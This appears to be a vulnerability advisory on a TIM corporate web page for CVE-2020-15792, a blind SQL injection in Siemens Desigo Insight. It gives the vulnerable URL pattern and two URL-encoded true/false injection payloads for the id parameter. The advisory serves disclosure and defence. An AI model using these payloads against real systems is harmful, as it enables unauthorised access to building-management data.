La Sostenibilità per TIM

Il Report 2024 accoglie i principi della Corporate Sustainability Reporting Directive (CSRD) ed è incluso nella Relazione Finanziaria e di Sostenibilità. Approfondisci

Ultimi Comunicati Stampa

Redazione ufficio stampa

Leggi gli ultimi comunicati stampa e naviga nell'archivio dell'Ufficio Stampa del Gruppo TIM. Leggi i comunicati

CVE-2020-15792 – Siemens Desigo Insight

CVE-2020-15792 – Siemens Desigo Insight

Vulnerability Description: CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)
Software Version: All versions
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-15792
CVSv3: 4.3
Severity
: Medium
Credits:
 Davide De Rubeis, Damiano Proietti, Matteo Brutti, Stefano Scipioni, Massimiliano Brolli

The web service does not properly apply input validation for the ID query parameter in a reserved area on the following URL

  • http://[IP]:[PORT]/desigo/lv-proprierties.aspx?id=[ID][SQL expression]

This could allow an authenticated attacker to retrieve data via a content-based blind SQL injection attack, using for example the following payloads:

CVE-2020-15792

Figure 1: true condition returns the object 465587

For a “true” response:

id=465587%20and%20%20%27asd%27=%27asd%27%20—

Click here to enlarge the image

CVE-2020-15792

Figure 2: false condition returns an error on the index

For a “false” response:

id=465587%20and%20%20%27asd%27=%27xxx%27%20—

Click here to enlarge the image